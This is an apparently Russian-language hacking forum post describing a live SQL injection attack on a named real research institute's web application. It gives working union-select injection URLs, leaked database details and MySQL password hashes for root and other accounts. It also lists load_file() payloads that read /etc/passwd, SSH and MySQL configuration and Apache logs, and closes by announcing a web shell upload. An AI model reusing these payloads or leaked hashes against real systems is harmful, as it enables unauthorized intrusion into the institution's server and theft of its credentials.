19.09.2010, 23:09
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами:
8854580
Репутация:
34
|
|
http://www.imedea.csic.es/ICG/php/curri.php?id=63009+and+1=0+union+select+1,version( )--
PR: 6 Tcy: 20
Database Version: 5.0.51a-3ubuntu5.7
Database name: personal
User name: webman@localhost
OC type: debian-linux-gnu
File_priv: Y
Тащим пароли:
root@localhost:*0CA25A7460DE36F573955BB6CC1037119D 430775
debian-sys-maint@localhost:*8555C67D4351FEBBCF51BDDFD449C54C3 11E0C51
webman@localhost:*A07537A34A4A4C6485AA51D2A3C32973 C954D5A6
http://www.imedea.csic.es/phpMyAdmin/index.php - 200 OK
Кое-что интересное:
Сообщение от None
-------------------------------------------------------
LFI/Reader/Load_file() - unvisual error when wrong query
-------------------------------------------------------
http://www.imedea.csic.es/ICG/php/curri.php?id=63009+and+1=0+union+select+1,load_fil e('
/etc/vsftpd.conf
')
http://www.imedea.csic.es/ICG/php/curri.php?id=63009+and+1=0+union+select+1,load_fil e('
/etc/mysql/my.cnf
')
http://www.imedea.csic.es/ICG/php/curri.php?id=63009+and+1=0+union+select+1,load_fil e('
/etc/ssh/sshd_config
')
http://www.imedea.csic.es/ICG/php/curri.php?id=63009+and+1=0+union+select+1,load_fil e('
/etc/passwd
')
http://www.imedea.csic.es/ICG/php/curri.php?id=63009+and+1=0+union+select+1,load_fil e('
/var/log/apache2/error.log
')
Итог: есть файловые привилегии, mq=off, путь до сайта можно посмотреть в логах ошибок апача
Льём шелл
|
|
|